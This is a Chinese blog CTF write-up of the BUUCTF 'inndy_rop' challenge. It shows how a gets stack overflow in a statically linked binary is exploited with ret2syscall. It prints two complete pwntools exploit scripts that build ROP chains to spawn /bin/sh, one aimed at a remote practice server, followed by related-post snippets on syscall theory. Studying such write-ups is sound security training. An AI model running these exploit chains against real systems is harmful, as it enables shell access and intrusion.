ret2syscall

已于 2024-09-10 17:05:10 修改
阅读量333 收藏 10
点赞数 3
文章标签: linux
于 2024-09-10 14:07:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_81899310/article/details/142096378
版权

[buu] inndy_rop

检查保护,文件只开启了NX。接着丢进ida里

找到目标函数,gets函数存在明显的栈溢出,并且可以看到该程序是静态链接的程序,这也就意味着我们可以找到足够使用的gaget去构造rop链从而控制程序执行流。

动调确定溢出长度位offset=16

寻找目标gagets

0x080b8016 : pop eax ; ret
0x080481c9 : pop ebx ; ret
0x080de769 : pop ecx ; ret
0x0806ecda : pop edx ; ret

对应exp:

from pwn import*
i=process("./rop")
context.log_level="debug"
 
pop_eax=0x080b8016
pop_ebx=0x080481c9
pop_ecx=0x080de769
pop_edx=0x0806ecda
int80=0x0806f430#用radare2,ropgadget搜索不到int 0x80;ret
bss=0x080EB5BD
p1=cyclic(0xc+4)
p1+=flat([pop_eax,0x3,pop_ebx,0,pop_ecx,bss,pop_edx,0x10,int80])
p1+=flat([pop_eax,0xb,pop_ebx,bss,pop_ecx,0,pop_edx,0,int80])
 
 
i.sendline(p1)
i.sendline(b"/bin/sh\x00")
 
i.interactive()

也可利用ropchain

exp:

from pwn import*
from struct import*     #pack
#io=process('./rop')
io=remote('node4.buuoj.cn',29207)
p=b'a'*(0xc+4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
io.sendline(p)
io.interactive()

igiohhh
关注
ARM Linux系统调用详细分析
liduxun的专栏
08-31 9207
文件: linux-2.6.30.4/arch/arm/kernel/entry-common.S linux-2.6.30.4/arch/arm/kernel/calls.S 在entry-common.S中包含了上次calls.S,这里简单分析前两次: 第一次: 在entry-common.S中: .equ NR_syscalls,0 #define CALL(x) .equ
linux系统调用
nanfenglei23的专栏
12-14 1798
从原理到具体实现详细解释linux系统调用
Linux系统调用(syscall)原理(转)
weixin_34245169的博客
03-13 1680
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-ar...
Android Hook框架adbi的分析(3)---编译和inline Hook实践
Fly20141201. 的专栏
07-16 3603
本文博客地址:http://blog.youkuaiyun.com/qq1084283172/article/details/75200800一、序言在前面的博客中,已经分析过了Android Hook框架adbi源码的具体实现,Android Hook框架adbi的实现主要分为两部分,一部分是root权限下的Android跨进程的so注入,一部分是基于Android系统的inline Hook。
【PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3135
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ret2syscall简单总结
ULGANOY的博客
07-05 1350
主要是自己的简单的学习总结。
ret2syscall 入门
akdelt的博客
01-24 599
系统调用是操作习系统提供给应用程序的一种接口,允许应用程序请求操作系统执行特权指令,如文件操作,网络通信,进程管理等。x86 通过 int 0x80 指令进行系统调用,amd64 通过 syscall 指令进行系统调用比如 write 函数32位汇编代码系统调用号,触发 nr_writemov ebx,1mov edx,13int 0x80;中断触发系统调用‘’
RET2syscall
T_Fire_of_Square的博客
12-18 304
基本rop之一,意为call system,控制程序执行系统调用,获取shell。
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1399
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
栈溢出漏洞利用二,ret2syscall,构造rop链条实现攻击(pwn入门)
2402_83422357的博客
06-12 1147
有点时候不存在/bin/sh字符串也是可以用这种攻击手法打的,就是使用read函数把/bin/sh写入.bss段,也可以控制程序执行系统调用,获取 shell。
Linux上安装Miniconda
最新发布
qq_45688164的博客
05-24 412
本文介绍了在Linux系统上安装Anaconda或Miniconda的详细步骤。主要内容包括:1) 版本选择(推荐轻量级的Miniconda);2) 下载安装脚本;3) 运行安装并初始化;4) 配置conda(如修改默认通道);5) 创建虚拟环境;6) 卸载方法。还提供了常见问题解决方案,如命令未找到、下载速度慢等。安装流程推荐优先使用Miniconda,通过创建虚拟环境实现包管理的便捷性和环境隔离。
ubuntu下实时检测机械硬盘和固态硬盘温度
前行居士
05-20 546
本文介绍了如何在Linux系统中使用smartmontools工具监控硬盘温度。首先,通过sudo apt update和sudo apt install smartmontools命令安装工具。接着,使用sudo smartctl -a /dev/sda查看硬盘详细信息,包括温度。虽然smartctl无法实时显示温度,但可以通过watch命令定期查看,如watch -n 10 "sudo smartctl -a /dev/sda | grep Temperature_Celsius",
Linux 搭建FTP服务器(vsftpd)
Stringzhua的博客
05-22 1208
或者修改/etc/selinux/config文件,将SELINUX=enconfig改为SELINUX=disabled,然后重启系统。在Linux上查看,发现已经有了scptoserver.txt文件,说明文件复制到服务器成功!默认即可,如果有需要可以修改/etc/ssh/sshd_config文件。scp 本地文件 user@远程服务器IP:/远程目录/在win10使用git的bash窗口上传文件到Linux。scp root@远程服务器ip:/远程文件 本地目录/
部署springBoot项目的脚本-linux
zilin-lynn的博客
05-19 841
说明,maven打包时,可以将脚本打包跟jar包在同一个目录。
RHCSA Linux 系统 硬盘管理
Y_P_W的博客
05-23 722
1扇区 = 512B,分区 = 多个扇区 ×512B查看硬盘命令~]# lsblk。
Linux中的tty与login之间的关系
zyqash的博客
05-23 510
项目login角色启动登录界面、捕获用户名用户身份认证,启动用户 shell运行时机系统启动后由 systemd/init 启动由agetty调用,完成认证替换关系agetty被login替换login被用户的 shell 替换如果你使用ps或pstree查看,会看到agetty和login不会同时存在于同一个终端上。
Linux 服务器磁盘映像备份与恢复实战指南】虚拟机备份,物理机上云都可以用这套方案!
weixin_39372311的博客
05-22 971
通过dd命令结合 NFS 实现全盘映像备份与恢复,是一种高效的服务器数据迁移方案。本文详细记录了从备份到恢复的完整流程,以及处理initramfs紧急模式的修复方法。使用dd确保全量备份,结合 NFS 提供可靠存储。恢复到裸盘并移除原系统盘,简化启动配置。通过fsck修复文件系统,解决initramfs问题。后续建议配置 RAID(如 RAID 1)以提高数据冗余。定期验证备份完整性,建立自动化备份机制(如cronrsync使用监控工具(如)跟踪磁盘健康状态。
ret2syscall系统调用
03-24
<think>好的,我现在需要帮助用户了解ret2syscall技术及其在系统调用中的应用,特别是其原理和实现方式。首先,我得回忆一下自己对这个主题的了解,并整理相关资料。根据用户提供的引用内容,我需要结合这些信息来构建一个清晰准确的回答。 首先,ret2syscall是一种ROP(Return-Oriented Programming)攻击技术,利用程序中已有的代码片段(gadgets)来执行系统调用。系统调用是用户态程序请求内核服务的方式,比如在Linux中,x86架构使用int 0x80指令,而amd64使用syscall指令。这一点在引用[1]和[2]中都有提到。 接下来,我需要解释ret2syscall的基本原理。通常,攻击者通过溢出覆盖返回地址,控制程序执行流,将多个gadgets串联起来,设置系统调用所需的参数,然后触发系统调用。例如,执行execve("/bin/sh",0,0)来获取shell。引用[3]提到了需要找到/bin/sh字符串的地址,这也是构造payload的一部分。 然后,实现步骤需要详细说明。包括如何寻找gadgets,如何设置寄存器(eax存放系统调用号,ebx、ecx、edx等存放参数),以及如何触发int 0x80或syscall指令。这部分需要结合引用中的例子,比如如何通过ROPgadget工具找到所需的指令片段和字符串地址。 可能遇到的问题包括如何确保寄存器的正确设置,以及不同架构下的指令差异。例如,x86和amd64的系统调用指令和寄存器使用可能不同,需要特别指出。此外,堆栈平衡和地址对齐的问题也需要考虑,避免程序崩溃。 最后,生成相关问题时要围绕技术原理、工具使用、防御措施和应用场景展开,确保问题覆盖用户可能感兴趣的各个方面。需要检查引用内容是否准确,并正确标注来源,比如int 0x80和syscall的区别来自引用[1]和[2],/bin/sh字符串的查找方法来自引用[3]。 总结下来,回答需要结构清晰,逐步解释ret2syscall的原理、实现步骤、关键点,并引用提供的资料来支持每个部分的内容。同时,确保语言准确,符合用户的要求,使用中文,并正确应用LaTeX格式。</think>### ret2syscall 技术解析 #### 1. 技术原理 ret2syscall 是一种基于 **ROP(Return-Oriented Programming)** 的攻击技术,通过控制程序执行流,组合代码片段(gadgets)触发系统调用。其核心在于利用程序中已有的指令片段,按特定顺序执行,最终调用如 `execve("/bin/sh")` 等系统函数获取控制权。 系统调用原理: - **x86架构** 使用 `int 0x80` 指令触发系统调用,系统调用号存入 `eax`,参数依次存入 `ebx`、`ecx`、`edx` 等寄存器[^1]。 - **amd64架构** 使用 `syscall` 指令,调用号存入 `rax`,参数使用 `rdi`、`rsi`、`rdx` 等寄存器[^2]。 #### 2. 实现步骤 1. **寻找gadgets** 通过工具(如 `ROPgadget`)搜索以下指令片段: - 控制寄存器的指令(如 `pop eax; ret`)。 - 数据传递指令(如 `mov [ebx], ecx; ret`)。 - 系统调用触发指令(`int 0x80` 或 `syscall`)[^2]。 2. **构造参数链** 以执行 `execve("/bin/sh", 0, 0)` 为例: - **系统调用号**:`execve` 在 x86 中为 `0x0b`(`eax=11`)。 - **参数设置**:`ebx` 指向 `/bin/sh` 字符串地址,`ecx` 和 `edx` 设为 `0`[^3]。 3. **构建Payload** 示例 payload 结构(x86): ```plaintext [填充数据] + [pop eax; ret地址] + [0x0b] + [pop ebx; ret地址] + [/bin/sh地址] + [int 0x80地址] ``` #### 3. 关键点 - **字符串地址获取**:需定位 `/bin/sh` 在内存中的地址,可通过工具搜索或动态泄漏。 - **架构差异**:x86 与 amd64 的寄存器及调用指令不同,需针对性构造。 - **堆栈平衡**:需确保 `ret` 指令链的堆栈操作正确,避免崩溃。 #### 4. 防御措施 - **地址随机化(ASLR)**:增加预测内存地址的难度。 - **栈保护(Stack Canary)**:检测栈溢出。 - **代码段不可执行(NX)**:阻止直接执行栈中的代码。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值